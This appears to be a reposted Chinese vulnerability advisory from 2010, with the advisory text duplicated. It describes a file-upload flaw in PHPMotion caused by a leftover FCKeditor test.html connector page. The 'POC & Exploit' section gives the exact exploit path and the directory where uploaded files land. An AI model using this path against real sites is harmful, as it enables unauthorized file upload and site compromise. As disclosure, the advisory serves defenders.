发布日期:2010-12.28
发布作者:anonymous
官方网站:http://www.phpmotion.com/
漏洞类型:文件上传
漏洞描述:phpmotion程序使用FCKeditor编辑器,未对test.html页面进行删除导致上传文件漏洞。
I. POC & Exploit
-----------------------------------------------------------------------
Default : http://127.0.0.1/
exploit : http://127.0.0.1/phpmotion/fckeditor/editor/filemanager/connectors/test.html
results in : http://127.0.0.1/userfiles/name of file
发布作者:anonymous
官方网站:http://www.phpmotion.com/
漏洞类型:文件上传
漏洞描述:phpmotion程序使用FCKeditor编辑器,未对test.html页面进行删除导致上传文件漏洞。
I. POC & Exploit
-----------------------------------------------------------------------
Default : http://127.0.0.1/
exploit : http://127.0.0.1/phpmotion/fckeditor/editor/filemanager/connectors/test.html
results in : http://127.0.0.1/userfiles/name of file
本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:http://yesck.com/post/382/
赞(0)
赏
使用wvdial启动ppp协议拨号上网
上一篇
2010年12月29日 20:07
微软WMITOOLS ActiveX 远程代码执行漏洞
下一篇
2010年12月29日 20:15
本文 暂无 评论